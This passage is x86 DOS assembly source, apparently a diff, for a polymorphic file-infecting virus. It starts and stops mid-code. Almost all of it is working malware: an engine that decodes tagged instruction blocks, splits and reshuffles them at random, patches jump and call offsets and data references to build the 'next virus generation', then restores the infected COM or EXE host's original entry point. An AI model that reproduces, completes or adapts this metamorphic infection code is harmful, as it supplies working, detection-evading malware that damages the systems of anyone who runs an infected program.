Jump to exam_blo__ + dw 0bb9h ; Pointer to exam_blo__ + db 02h ; Two bytes instruction + + cmp al,10h ; Data? + + db 01110110b+10000000b ; Below or equal? Jump to tmc_ini_... + dw 0bb8h ; Pointer to tmc_ini_loo + db 02h ; Two bytes instruction + + sub al,10h ; AL = length of data + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +exam_blo__ db 11101110b ; Beginning of block + dw 0bb9h ; Block identification of exam_blo__ + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01110101b+10000000b ; Not equal? Jump to exam_blo___ + dw 0bbah ; Pointer to exam_blo___ + db 02h ; Two bytes instruction + + mov al,00h ; Don't add anything to offset wit... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +exam_blo___ db 11101110b ; Beginning of block + dw 0bbah ; Block identification of exam_blo___ + db 02h ; Two bytes instruction + + cmp al,11101110b ; Beginning of block? + + db 01110101b+10000000b ; Not equal? 
Jump to next_byte_ + dw 0bbbh ; Pointer to next_byte_ + db 02h ; Two bytes instruction + + mov ax,si ; AX = offset of block identification + + db 01h ; One byte instruction + + dec ax ; AX = offset of block within table + + db 01h ; One byte instruction + + stosw ; Store offset of block within table + + db 03h ; Three bytes instruction + + mov ax,0ffffh ; Block is still in one part + + db 01h ; One byte instruction + + stosw ; Store block identification + + db 03h ; Three bytes instruction + + mov ax,02h ; Add two to offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +next_byte_ db 11101110b ; Beginning of block + dw 0bbbh ; Block identification of next_byte_ + db 02h ; Two bytes instruction + + mov al,02h ; Add two to offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +calc_blocks_ db 11101110b ; Beginning of block + dw 0bbch ; Block identification of calc_blo... + db 03h ; Three bytes instruction + + lea ax,[di-10h] ; AX = number of blocks multiplied... 
+ + db 02h ; Two bytes instruction + + shr ax,01h ; Divide number of blocks by two + + db 02h ; Two bytes instruction + + shr ax,01h ; Divide number of blocks by two + + db 04h ; Four bytes instruction + + mov es:[0ah],ax ; Store number of blocks + + db 02h ; Two bytes instruction + + xor ax,ax ; End of table + + db 01h ; One byte instruction + + stosw ; Store end of table + + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc0h ; Pointer to exam_bl + db 11101111b ; End of block +split_bloc db 11101110b ; Beginning of block + dw 0bbdh ; Block identification of split_bloc + db 01h ; One byte instruction + + push bp ; Save BP at stack + + db 05h ; Five bytes instruction + + mov bp,es:[0ah] ; BP = number of blocks + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 01h ; One byte instruction + + pop bp ; Load BP from stack + + db 02h ; Two bytes instruction + + shl ax,01h ; Multiply random number with two + + db 02h ; Two bytes instruction + + shl ax,01h ; Multiply random number with two + + db 03h ; Three bytes instruction + + add ax,10h ; Add ten to random number + + db 02h ; Two bytes instruction + + mov di,ax ; DI = random offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbeh ; Pointer to exam_nxt_bl_ + db 11101111b ; End of block +exam_nxt_bl_ db 11101110b ; Beginning of block + dw 0bbeh ; Block identification of exam_nxt... + db 03h ; Three bytes instruction + + add di,04h ; DI = offset of next offset withi... + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of next block within... + + db 02h ; Two bytes instruction + + or si,si ; End of table? + + db 01110101b+10000000b ; Not zero? 
Jump to exam_blo____ + dw 0bbfh ; Pointer to exam_blo____ + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbfh ; Pointer to exam_blo____ + db 11101111b ; End of block +exam_blo____ db 11101110b ; Beginning of block + dw 0bbfh ; Block identification of exam_blo... + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 01h ; One byte instruction + + dec si ; Decrease offset of block within ... + + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110101b+10000000b ; Not equal? Jump to exam_bl + dw 0bc0h ; Pointer to exam_bl + db 02h ; Two bytes instruction + + cmp di,ax ; End of table of blocks? + + db 01110101b+10000000b ; Not equal? Jump to exam_nxt_bl_ + dw 0bbeh ; Pointer to exam_nxt_bl_ + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcah ; Pointer to exam_tbl_in + db 11101111b ; End of block +exam_bl db 11101110b ; Beginning of block + dw 0bc0h ; Block identification of exam_bl + db 04h ; Four bytes instruction + + mov ax,es:[di+02h] ; AX = block information + + db 03h ; Three bytes instruction + + cmp ax,0ffffh ; Block is still in one part? + + db 01110100b+10000000b ; Equal? Jump to exam_bl_ + dw 0bc1h ; Pointer to exam_bl_ + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 02h ; Two bytes instruction + + mov di,ax ; DI = offset of end of first part... + + db 02h ; Two bytes instruction + + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + db 01h ; One byte instruction + + stosb ; Store JMP imm16 + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... 
+ + db 01h ; One byte instruction
+ + dec ax ; Decrease offset within next viru...
+ + db 02h ; Two bytes instruction
+ + sub ax,di ; Subtract offset of end of first ...
+ + db 01h ; One byte instruction
+ + stosw ; Store 16-bit immediate
+ + db 01h ; One byte instruction
+ + pop di ; Load DI from stack
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bc1h ; Pointer to exam_bl_
+ db 11101111b ; End of block
+exam_bl_ db 11101110b ; Beginning of block
+ dw 0bc1h ; Block identification of exam_bl_
+ db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0be0h ; Pointer to decrypt_byt
+ db 02h ; Two bytes instruction
+ + cmp al,11101111b ; End of block?
+ + db 01110100b+10000000b ; Equal? Jump to end_of_bloc
+ dw 0bc9h ; Pointer to end_of_bloc
+ db 02h ; Two bytes instruction
+ + cmp al,10h ; Data; CALL; JMP; Data reference...?
+ + db 01110111b+10000000b ; Above? Jump to exam_bl__
+ dw 0bc2h ; Pointer to exam_bl__
+ db 01h ; One byte instruction
+ + push ax ; Save AX at stack
+ + db 01h ; One byte instruction
+ + push bp ; Save BP at stack
+ + db 04h ; Four bytes instruction
+ + mov bp,[bp+1234h] ; BP = probability
+ + db 11101101b ; Data reference
+ dw 0bech ; Pointer to probability_
+ db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0bd5h ; Pointer to rnd_in_rang
+ db 02h ; Two bytes instruction
+ + or ax,ax ; Split up block?
+ + db 01h ; One byte instruction
+ + pop bp ; Load BP from stack
+ + db 01h ; One byte instruction
+ + pop ax ; Load AX from stack
+ + db 01110100b+10000000b ; Zero? Jump to split_bloc_
+ dw 0bc8h ; Pointer to split_bloc_
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bc2h ; Pointer to exam_bl__
+ db 11101111b ; End of block
+exam_bl__ db 11101110b ; Beginning of block
+ dw 0bc2h ; Block identification of exam_bl__
+ db 02h ; Two bytes instruction
+ + cmp al,11101111b ; End of block?
+ + db 01110100b+10000000b ; Equal?
Jump to end_of_bloc
+ dw 0bc9h ; Pointer to end_of_bloc
+ db 02h ; Two bytes instruction
+ + cmp al,11101000b ; CALL; JMP; Data reference; Jcc?
+ + db 01110011b+10000000b ; Above or equal? Jump to exam_data_
+ dw 0bc4h ; Pointer to exam_data_
+ db 02h ; Two bytes instruction
+ + cmp al,10h ; Data?
+ + db 01110110b+10000000b ; Below or equal? Jump to sto_inst...
+ dw 0bc3h ; Pointer to sto_instruc
+ db 02h ; Two bytes instruction
+ + sub al,10h ; AL = length of data
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bc3h ; Pointer to sto_instruc
+ db 11101111b ; End of block
+sto_instruc db 11101110b ; Beginning of block
+ dw 0bc3h ; Block identification of sto_inst...
+ db 02h ; Two bytes instruction
+ + xor cx,cx ; Zero CX
+ + db 02h ; Two bytes instruction
+ + mov cl,al ; CL = length of instruction
+ + db 01h ; One byte instruction
+ + push di ; Save DI at stack
+ + db 02h ; Two bytes instruction
+ + mov di,bx ; DI = offset within next virus ge...
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0beah ; Pointer to sto_ins_loo
+ db 11101111b ; End of block
+sto_ins_loo db 11101110b ; Beginning of block
+ dw 0beah ; Block identification of store_op...
+ db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0be0h ; Pointer to decrypt_byt
+ db 01h ; One byte instruction
+ + stosb ; Store byte of instruction
+ + db 01h ; One byte instruction
+ + dec cx ; Decrease counter
+ + db 01110101b+10000000b ; Not zero? Jump to sto_ins_loo
+ dw 0beah ; Pointer to sto_ins_loo
+ db 02h ; Two bytes instruction
+ + mov bx,di ; BX = offset within next virus ge...
+ + db 01h ; One byte instruction
+ + pop di ; Load DI from stack
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bc1h ; Pointer to exam_bl_
+ db 11101111b ; End of block
+exam_data_ db 11101110b ; Beginning of block
+ dw 0bc4h ; Block identification of exam_data_
+ db 02h ; Two bytes instruction
+ + cmp al,11101101b ; Data reference?
+ + db 01110101b+10000000b ; Not equal?
Jump to exam_bl___
+ dw 0bc5h ; Pointer to exam_bl___
+ db 01h ; One byte instruction
+ + push di ; Save DI at stack
+ + db 05h ; Five bytes instruction
+ + mov di,es:[08h] ; DI = offset within data information
+ + db 02h ; Two bytes instruction
+ + mov ax,bx ; AX = offset within next virus ge...
+ + db 01h ; One byte instruction
+ + dec ax ; Decrease offset within next viru...
+ + db 01h ; One byte instruction
+ + dec ax ; Decrease offset within next viru...
+ + db 01h ; One byte instruction
+ + stosw ; Store offset within next virus g...
+ + db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0be1h ; Pointer to decrypt_id_
+ db 01h ; One byte instruction
+ + stosw ; Store block identification
+ + db 05h ; Five bytes instruction
+ + mov es:[08h],di ; Store offset within data informa...
+ + db 01h ; One byte instruction
+ + pop di ; Load DI from stack
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bc1h ; Pointer to exam_bl_
+ db 11101111b ; End of block
+exam_bl___ db 11101110b ; Beginning of block
+ dw 0bc5h ; Block identification of exam_bl___
+ db 02h ; Two bytes instruction
+ + cmp al,11101110b ; Beginning of block?
+ + db 01110101b+10000000b ; Not equal? Jump to sto_call_jm_
+ dw 0bc7h ; Pointer to sto_call_jm_
+ db 01h ; One byte instruction
+ + push di ; Save DI at stack
+ + db 05h ; Five bytes instruction
+ + mov di,es:[04h] ; DI = offset within block informa...
+ + db 02h ; Two bytes instruction
+ + mov ax,bx ; AX = offset within next virus ge...
+ + db 01h ; One byte instruction
+ + stosw ; Store offset within next virus ge...
+ + db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0be1h ; Pointer to decrypt_id_
+ db 01h ; One byte instruction
+ + stosw ; Store block identification
+ + db 05h ; Five bytes instruction
+ + mov es:[04h],di ; Store offset within block inform...
+ + db 03h ; Three bytes instruction
+ + cmp ax,4c5h ; Block identification of tmc_table_?
+ + db 01110101b+10000000b ; Not equal?
Jump to exam_messag
+ dw 0bc6h ; Pointer to exam_messag
+ db 01h ; One byte instruction
+ + push si ; Save SI at stack
+ + db 02h ; Two bytes instruction
+ + mov di,bx ; DI = offset within next virus ge...
+ + db 04h ; Four bytes instruction
+ + lea si,[bp+1234h] ; SI = offset of tmc_table_
+ + db 11101101b ; Data reference
+ dw 4c5h ; Pointer to tmc_table_
+ db 03h ; Three bytes instruction
+ + mov cx,(code_end-first_table)
+ + db 02h ; Two bytes instruction
+ + rep movsb ; Move table to top of memory
+ + db 02h ; Two bytes instruction
+ + mov bx,di ; BX = offset within next virus ge...
+ + db 01h ; One byte instruction
+ + pop si ; Load SI from stack
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bebh ; Pointer to examine_nex
+ db 11101111b ; End of block
+exam_messag db 11101110b ; Beginning of block
+ dw 0bc6h ; Block identification of exam_mes...
+ db 03h ; Three bytes instruction
+ + cmp ax,2328h ; Block identification of message?
+ + db 01110101b+10000000b ; Not equal? Jump to exam_probab
+ dw 0bedh ; Pointer to exam_probab
+ db 03h ; Three bytes instruction
+ + mov ax,14h ; Probability of including message
+ + db 04h ; Four bytes instruction
+ + cmp [bp+1234h],ax ; Include message?
+ + db 11101101b ; Data reference
+ dw 0bech ; Pointer to probability_
+ db 01110011b+10000000b ; Above or equal? Jump to examine_...
+ dw 0bebh ; Pointer to examine_nex
+ db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0be0h ; Pointer to decrypt_byt
+ db 02h ; Two bytes instruction
+ + sub al,10h ; AL = length of message
+ + db 02h ; Two bytes instruction
+ + mov ah,00h ; Zero AH
+ + db 02h ; Two bytes instruction
+ + add si,ax ; SI = offset of end of message
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bebh ; Pointer to examine_nex
+ db 11101111b ; End of block
+exam_probab db 11101110b ; Beginning of block
+ dw 0bedh ; Block identification of exam_pro...
+ db 03h ; Three bytes instruction
+ + cmp ax,0bech ; Block identification of probabi...?
+ + db 01110101b+10000000b ; Not equal? Jump to examine_nex
+ dw 0bebh ; Pointer to examine_nex
+ db 04h ; Four bytes instruction
+ + mov ax,[bp+1234h] ; AX = probability_
+ + db 11101101b ; Data reference
+ dw 0bech ; Pointer to probability_
+ db 01h ; One byte instruction
+ + dec ax ; Decrease probability
+ + db 03h ; Three bytes instruction
+ + cmp ax,05h ; Probability too small?
+ + db 01110011b+10000000b ; Above or equal? Jump to store_pr...
+ dw 0bf5h ; Pointer to store_proba
+ db 03h ; Three bytes instruction
+ + mov ax,64h ; Reset probability
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bf5h ; Pointer to store_proba
+ db 11101111b ; End of block
+store_proba db 11101110b ; Beginning of block
+ dw 0bf5h ; Block identification of store_pr...
+ db 03h ; Three bytes instruction
+ + mov es:[bx],ax ; Store probability
+ + db 03h ; Three bytes instruction
+ + add bx,02h ; Add two to offset within next vi...
+ + db 03h ; Three bytes instruction
+ + add si,03h ; SI = offset of beginning of next...
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bebh ; Pointer to examine_nex
+ db 11101111b ; End of block
+examine_nex db 11101110b ; Beginning of block
+ dw 0bebh ; Block identification of examine_...
+ db 01h ; One byte instruction
+ + pop di ; Load DI from stack
+ + db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0be0h ; Pointer to decrypt_byt
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bc2h ; Pointer to exam_bl__
+ db 11101111b ; End of block
+sto_call_jm_ db 11101110b ; Beginning of block
+ dw 0bc7h ; Block identification of sto_call...
+ db 01h ; One byte instruction
+ + push ax ; Save AX at stack
+ + db 01h ; One byte instruction
+ + push di ; Save DI at stack
+ + db 05h ; Five bytes instruction
+ + mov di,es:[06h] ; DI = offset within CALL; JMP; Jc...
+ + db 02h ; Two bytes instruction
+ + mov ax,bx ; AX = offset within next virus ge...
+ + db 01h ; One byte instruction
+ + stosw ; Store offset within next virus g...
+ + db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0be1h ; Pointer to decrypt_id_
+ db 01h ; One byte instruction
+ + stosw ; Store block identification
+ + db 05h ; Five bytes instruction
+ + mov es:[06h],di ; Store offset within CALL; JMP; J...
+ + db 01h ; One byte instruction
+ + pop di ; Load DI from stack
+ + db 01h ; One byte instruction
+ + pop ax ; Load AX from stack
+ + db 03h ; Three bytes instruction
+ + mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc...
+ + db 03h ; Three bytes instruction
+ + add bx,03h ; Add three to offset within next ...
+ + db 02h ; Two bytes instruction
+ + cmp al,11110000b ; Jump condition?
+ + db 01110010b+10000000b ; Below? Jump to exam_bl_
+ dw 0bc1h ; Pointer to exam_bl_
+ db 01h ; One byte instruction
+ + inc bx ; Increase offset within next viru...
+ + db 01h ; One byte instruction
+ + inc bx ; Increase offset within next viru...
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bc1h ; Pointer to exam_bl_
+ db 11101111b ; End of block
+split_bloc_ db 11101110b ; Beginning of block
+ dw 0bc8h ; Block identification of split_bloc_
+ db 04h ; Four bytes instruction
+ + mov es:[di+02h],bx ; Store offset within next virus g...
+ + db 03h ; Three bytes instruction
+ + add bx,03h ; Add three to offset within next ...
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bc9h ; Pointer to end_of_bloc
+ db 11101111b ; End of block
+end_of_bloc db 11101110b ; Beginning of block
+ dw 0bc9h ; Block identification of end_of_b...
+ db 01h ; One byte instruction
+ + dec si ; Decrease offset of block within ...
+ + db 03h ; Three bytes instruction
+ + mov es:[di],si ; Store offset of block within table
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bbdh ; Pointer to split_bloc
+ db 11101111b ; End of block
+exam_tbl_in db 11101110b ; Beginning of block
+ dw 0bcah ; Block identification of exam_tbl...
+ db 06h ; Six bytes instruction
+ + cmp word ptr es:[0ch],00h
+ + db 01110101b+10000000b ; End of second table? Jump to cor...
+ dw 0fa1h ; Pointer to correc_i16
+ db 01h ; One byte instruction
+ + pop si ; Load SI from stack
+ + db 05h ; Five bytes instruction
+ + mov es:[0ch],bx ; Store offset within next virus g...
+ + db 04h ; Four bytes instruction
+ + add si,(second_table-first_table)
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0fa0h ; Pointer to initial_tmc_
+ db 11101111b ; End of block
+correc_i16 db 11101110b ; Beginning of block
+ dw 0fa1h ; Block identification of correc_i16
+ db 01h ; One byte instruction
+ + push es ; Save ES at stack
+ + db 01h ; One byte instruction
+ + pop ds ; Load DS from stack (ES)
+ + db 04h ; Four bytes instruction
+ + sub bx,4000h ; Subtract offset of next virus ge...
+ + db 04h ; Four bytes instruction
+ + mov ds:[0eh],bx ; Store length of virus
+ + db 03h ; Three bytes instruction
+ + mov si,2000h ; SI = offset of CALL; JMP; Jcc im...
+ + db 04h ; Four bytes instruction
+ + mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;...
+ + db 02h ; Two bytes instruction
+ + sub cx,si ; Subtract offset of CALL; JMP; Jc...
+ + db 02h ; Two bytes instruction
+ + shr cx,01h ; Divide number of CALL imm16; JMP...
+ + db 02h ; Two bytes instruction
+ + shr cx,01h ; Divide number of CALL imm16; JMP...
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bcbh ; Pointer to jmp_call_lo
+ db 11101111b ; End of block
+jmp_call_lo db 11101110b ; Beginning of block
+ dw 0bcbh ; Block identification of jmp_call...
+ db 01h ; One byte instruction
+ + lodsw ; AX = offset of block within data...
+ + db 01h ; One byte instruction
+ + push ax ; Save AX at stack
+ + db 01h ; One byte instruction
+ + lodsw ; AX = offset of block within data...
+ + db 01h ; One byte instruction
+ + push cx ; Save CX at stack
+ + db 01h ; One byte instruction
+ + push si ; Save SI at stack
+ + db 03h ; Three bytes instruction
+ + mov si,1000h ; SI = offset of block information
+ + db 04h ; Four bytes instruction
+ + mov cx,ds:[04h] ; CX = offset of end of block info...
+ + db 02h ; Two bytes instruction
+ + sub cx,si ; Subtract offset of block informa...
+ + db 02h ; Two bytes instruction
+ + shr cx,01h ; Divide number of block by two
+ + db 02h ; Two bytes instruction
+ + shr cx,01h ; Divide number of block by two
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bcch ; Pointer to find_block__
+ db 11101111b ; End of block
+find_block__ db 11101110b ; Beginning of block
+ dw 0bcch ; Block identification of find_blo...
+ db 03h ; Three bytes instruction
+ + cmp ax,[si+02h] ; Found block?
+ + db 01110100b+10000000b ; Equal? Jump to found_bloc
+ dw 0bcdh ; Pointer to found_bloc
+ db 03h ; Three bytes instruction
+ + add si,04h ; SI = offset of next block in table
+ + db 01h ; One byte instruction
+ + dec cx ; Decrease counter
+ + db 01110101b+10000000b ; Not zero? Jump to find_block__
+ dw 0bcch ; Pointer to find_block__
+ db 11101111b ; End of block
+found_bloc db 11101110b ; Beginning of block
+ dw 0bcdh ; Block identification of found_bloc
+ db 02h ; Two bytes instruction
+ + mov dx,[si] ; DX = offset of block
+ + db 01h ; One byte instruction
+ + pop si ; Load SI from stack
+ + db 01h ; One byte instruction
+ + pop cx ; Load CX from stack
+ + db 01h ; One byte instruction
+ + pop bx ; Load BX from stack (AX)
+ + db 02h ; Two bytes instruction
+ + mov al,[bx] ; AL = first byte of instruction
+ + db 02h ; Two bytes instruction
+ + cmp al,11110000b ; Jump condition?
+ + db 01110010b+10000000b ; Below? Jump to sto_call_j
+ dw 0bcfh ; Pointer to sto_call_j
+ db 03h ; Three bytes instruction
+ + sub byte ptr [bx],10000000b
+ + db 01h ; One byte instruction
+ + inc bx ; BX = offset of 8-bit immediate
+ + db 01h ; One byte instruction
+ + push dx ; Save DX at stack
+ + db 02h ; Two bytes instruction
+ + sub dx,bx ; Subtract offset within next viru...
+ + db 01h ; One byte instruction
+ + dec dx ; Decrease 8-bit immediate
+ + db 03h ; Three bytes instruction
+ + cmp dx,7fh ; 8-bit immediate out of range?
+ + db 01111111b+10000000b ; Greater? Jump to invert_jcc_
+ dw 0bceh ; Pointer to invert_jcc_
+ db 03h ; Three bytes instruction
+ + cmp dx,0ff80h ; 8-bit immediate out of range?
+ + db 01111100b+10000000b ; Less? Jump to invert_jcc_
+ dw 0bceh ; Pointer to invert_jcc_
+ db 02h ; Two bytes instruction
+ + mov [bx],dl ; Store 8-bit immediate
+ + db 01h ; One byte instruction
+ + inc bx ; BX = offset of end of Jcc imm8
+ + db 04h ; Four bytes instruction
+ + mov [bx],1001000010010000b
+ + db 04h ; Four bytes instruction
+ + mov byte ptr [bx+02h],10010000b
+ + db 01h ; One byte instruction
+ + pop dx ; Load DX from stack
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bd0h ; Pointer to correc_i16_
+ db 11101111b ; End of block
+invert_jcc_ db 11101110b ; Beginning of block
+ dw 0bceh ; Block identification of invert_jcc_
+ db 01h ; One byte instruction
+ + pop dx ; Load DX from stack
+ + db 01h ; One byte instruction
+ + dec bx ; BX = offset of Jcc imm8
+ + db 03h ; Three bytes instruction
+ + xor byte ptr [bx],00000001b
+ + db 01h ; One byte instruction
+ + inc bx ; BX = offset of 8-bit immediate
+ + db 03h ; Three bytes instruction
+ + mov byte ptr [bx],03h ; Store 8-bit immediate
+ + db 01h ; One byte instruction
+ + inc bx ; BX = offset of JMP imm16
+ + db 02h ; Two bytes instruction
+ + mov al,11101001b ; JMP imm16 (opcode 0e9h)
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bcfh ; Pointer to sto_call_j
+ db 11101111b ; End of block
+sto_call_j db 11101110b ; Beginning of block
+ dw 0bcfh ; Block identification of sto_call...
+ db 02h ; Two bytes instruction
+ + mov [bx],al ; Store CALL imm16; JMP imm16
+ + db 01h ; One byte instruction
+ + inc bx ; BX = offset of 16-bit immediate
+ + db 02h ; Two bytes instruction
+ + sub dx,bx ; Subtract offset within next viru...
+ + db 01h ; One byte instruction
+ + dec dx ; Decrease 16-bit immediate
+ + db 01h ; One byte instruction
+ + dec dx ; Decrease 16-bit immediate
+ + db 02h ; Two bytes instruction
+ + mov [bx],dx ; Store 16-bit immediate
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bd0h ; Pointer to correc_i16_
+ db 11101111b ; End of block
+correc_i16_ db 11101110b ; Beginning of block
+ dw 0bd0h ; Block identification of correc_...
+ db 01h ; One byte instruction
+ + dec cx ; Decrease counter
+ + db 01110101b+10000000b ; Not zero? Jump to jmp_call_lo
+ dw 0bcbh ; Pointer to jmp_call_lo
+ db 03h ; Three bytes instruction
+ + mov si,3000h ; SI = offset of data information
+ + db 04h ; Four bytes instruction
+ + mov cx,ds:[08h] ; CX = offset of end of data infor...
+ + db 02h ; Two bytes instruction
+ + sub cx,si ; Subtract offset of data informat...
+ + db 02h ; Two bytes instruction
+ + shr cx,01h ; Divide number of data references...
+ + db 02h ; Two bytes instruction
+ + shr cx,01h ; Divide number of data references...
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bd1h ; Pointer to data_ref_lo
+ db 11101111b ; End of block
+data_ref_lo db 11101110b ; Beginning of block
+ dw 0bd1h ; Block identification of data_ref_lo
+ db 01h ; One byte instruction
+ + lodsw ; AX = offset of block within data...
+ + db 01h ; One byte instruction
+ + push ax ; Save AX at stack
+ + db 01h ; One byte instruction
+ + lodsw ; AX = offset of block within data...
+ + db 01h ; One byte instruction
+ + push cx ; Save CX at stack
+ + db 01h ; One byte instruction
+ + push si ; Save SI at stack
+ + db 03h ; Three bytes instruction
+ + mov si,1000h ; SI = offset of block information
+ + db 04h ; Four bytes instruction
+ + mov cx,ds:[04h] ; CX = offset of end of block info...
+ + db 02h ; Two bytes instruction
+ + sub cx,si ; Subtract offset of block informa...
+ + db 02h ; Two bytes instruction
+ + shr cx,01h ; Divide number of block by two
+ + db 02h ; Two bytes instruction
+ + shr cx,01h ; Divide number of block by two
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0bd2h ; Pointer to find_bloc
+ db 11101111b ; End of block
+find_bloc db 11101110b ; Beginning of block
+ dw 0bd2h ; Block identification to find_bloc
+ db 03h ; Three bytes instruction
+ + cmp ax,[si+02h] ; Found block?
+ + db 01110100b+10000000b ; Equal? Jump to found_bloc_
+ dw 0bd3h ; Pointer to found_bloc_
+ db 03h ; Three bytes instruction
+ + add si,04h ; SI = offset of next block in table
+ + db 01h ; One byte instruction
+ + dec cx ; Decrease counter
+ + db 01110101b+10000000b ; Not zero? Jump to find_bloc
+ dw 0bd2h ; Pointer to find_bloc
+ db 11101111b ; End of block
+found_bloc_ db 11101110b ; Beginning of block
+ dw 0bd3h ; Block identification of found_bloc_
+ db 02h ; Two bytes instruction
+ + mov ax,[si] ; AX = offset of block
+ + db 01h ; One byte instruction
+ + pop si ; Load SI from stack
+ + db 01h ; One byte instruction
+ + pop cx ; Load CX from stack
+ + db 01h ; One byte instruction
+ + pop bx ; Load BX from stack (AX)
+ + db 03h ; Three bytes instruction
+ + sub ax,4000h ; Subtract offset of next virus ge...
+ + db 02h ; Two bytes instruction
+ + mov [bx],ax ; Store 16-bit immediate
+ + db 01h ; One byte instruction
+ + dec cx ; Decrease counter
+ + db 01110101b+10000000b ; Not zero? Jump to data_ref_lo
+ dw 0bd1h ; Pointer to data_ref_lo
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 1772h ; Pointer to restore_cod
+ db 11101111b ; End of block
+restore_cod db 11101110b ; Beginning of block
+ dw 1772h ; Block identification of restore_...
+ db 04h ; Four bytes instruction
+ + mov ax,[bp+1234h] ; AX = segment of PSP for current ...
+ + db 11101101b ; Data reference
+ dw 0befh ; Pointer to program_seg_
+ db 04h ; Four bytes instruction
+ + mov cx,[bp+1234h] ; CX = initial SS relative to star...
+ + db 11101101b ; Data reference
+ dw 138ah ; Pointer to initial_ss_
+ db 03h ; Three bytes instruction
+ + add cx,10h ; Add ten to initial SS relative t...
+ + db 02h ; Two bytes instruction
+ + add cx,ax ; Add segment of PSP for current p...
+ + db 01h ; One byte instruction
+ + push cx ; Save CX at stack
+ + db 04h ; Four bytes instruction
+ + push [bp+1234h] ; Save initial SP at stack
+ + db 11101101b ; Data reference
+ dw 138ch ; Pointer to initial_sp_
+ db 04h ; Four bytes instruction
+ + mov cx,[bp+1234h] ; CX = initial CS relative to star...
+ + db 11101101b ; Data reference
+ dw 1389h ; Pointer to initial_cs_
+ db 03h ; Three bytes instruction
+ + add cx,10h ; Add ten to initial CS relative t...
+ + db 02h ; Two bytes instruction
+ + add cx,ax ; Add segment of PSP for current p...
+ + db 01h ; One byte instruction
+ + push cx ; Save CX at stack
+ + db 04h ; Four bytes instruction
+ + push [bp+1234h] ; Save initial IP at stack
+ + db 11101101b ; Data reference
+ dw 138bh ; Pointer to initial_ip_
+ db 01h ; One byte instruction
+ + push ax ; Save segment of PSP for current ...
+ + db 04h ; Four bytes instruction
+ + push [bp+1234h] ; Save size of memory block in par...
+ + db 11101101b ; Data reference
+ dw 1395h ; Pointer to mcb_size__
+ db 01h ; One byte instruction
+ + push ds ; Save DS at stack
+ + db 02h ; Two bytes instruction
+ + mov cl,00h ; COM executable
+ + db 04h ; Four bytes instruction
+ + cmp [bp+1234h],cl ; COM executable?
+ + db 11101101b ; Data reference
+ dw 1388h ; Pointer to executa_sta
+ db 01110101b+10000000b ; Not equal? Jump to move_virus__
+ dw 1390h ; Pointer to move_virus__
+ db 04h ; Four bytes instruction
+ + lea si,[bp+1234h] ; SI = offset of origin_code_
+ + db 11101101b ; Data reference
+ dw 1f40h ; Pointer to origin_code_
+ db 03h ; Three bytes instruction
+ + mov ax,cs:[si] ; AX = first two bytes of original...
+ + db 04h ; Four bytes instruction
+ + mov cs:[100h],ax ; Store first two bytes of origina...
+ + db 04h ; Four bytes instruction
